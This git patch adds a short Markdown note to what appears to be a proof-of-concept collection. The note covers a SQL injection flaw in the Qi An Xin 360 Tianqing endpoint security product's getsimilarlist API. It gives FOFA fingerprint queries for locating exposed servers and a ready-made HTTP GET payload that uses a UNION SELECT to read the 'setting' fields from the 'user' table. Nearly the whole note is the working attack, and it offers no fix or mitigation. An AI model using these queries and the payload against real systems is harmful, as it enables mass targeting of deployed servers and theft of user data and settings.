From 198374821cbcc7633f4e0214fe5a9e67b645fd61 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Wed, 8 Nov 2023 19:47:36 +0800
Subject: [PATCH] =?UTF-8?q?Create=20=E5=A5=87=E5=AE=89=E4=BF=A1360?=
 =?UTF-8?q?=E5=A4=A9=E6=93=8EgetsimilarlistSQL=E6=B3=A8=E5=85=A5=E6=BC=8F?=
 =?UTF-8?q?=E6=B4=9E.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 奇安信360天擎getsimilarlistSQL注入漏洞.md | 13 +++++++++++++
 1 file changed, 13 insertions(+)
 create mode 100644 奇安信360天擎getsimilarlistSQL注入漏洞.md

diff --git a/奇安信360天擎getsimilarlistSQL注入漏洞.md b/奇安信360天擎getsimilarlistSQL注入漏洞.md
new file mode 100644
index 0000000..c93fecf
--- /dev/null
+++ b/奇安信360天擎getsimilarlistSQL注入漏洞.md
@@ -0,0 +1,13 @@
+
+## 奇安信360天擎getsimilarlistSQL注入漏洞
+
+## fofa
+```
+body="/task/index/detail?id={item.id}"
+title="360新天擎"
+```
+
+## POC
+```
+GET /api/client/getsimilarlist?status[0,1%29+union+all+select+%28%2F%2A%2150000select%2A%2F+79787337%29%2C+setting%2C+setting%2C+status%2C+name%2C+create_time+from+%22user%22+where+1+in+%281]=1&status[0]=1 HTTP/1.1
+```